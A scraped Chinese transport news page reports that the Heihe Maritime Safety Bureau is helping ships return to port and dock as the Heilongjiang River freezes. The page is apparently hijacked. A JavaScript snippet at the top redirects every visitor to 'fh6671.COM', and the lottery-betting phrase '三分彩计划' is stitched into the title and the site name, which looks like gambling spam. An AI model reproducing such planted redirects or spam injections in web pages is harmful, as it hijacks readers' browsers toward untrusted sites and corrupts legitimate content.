function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 图片新闻

黑河海事局着力保障船舶安全返港、入坞

2020-11-16 10:09:48 来源:中国交通新闻网 作者:王苏 田径 文 李森森 图

image.png

近日,黑龙江黑河段已进入7级流冰。为保障船舶运输安全,中方在港船舶已禁止出境,在俄方港口的中方船舶正在尽快组织返航。 黑河海事局组织骨干力量,着力保障船舶安全返港、入坞(如图),通知辖区航运企业按照口岸疫情防控和《船舶船员新冠肺炎疫情防控操作指南(V4.0)》相关要求做好收船工作。

中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。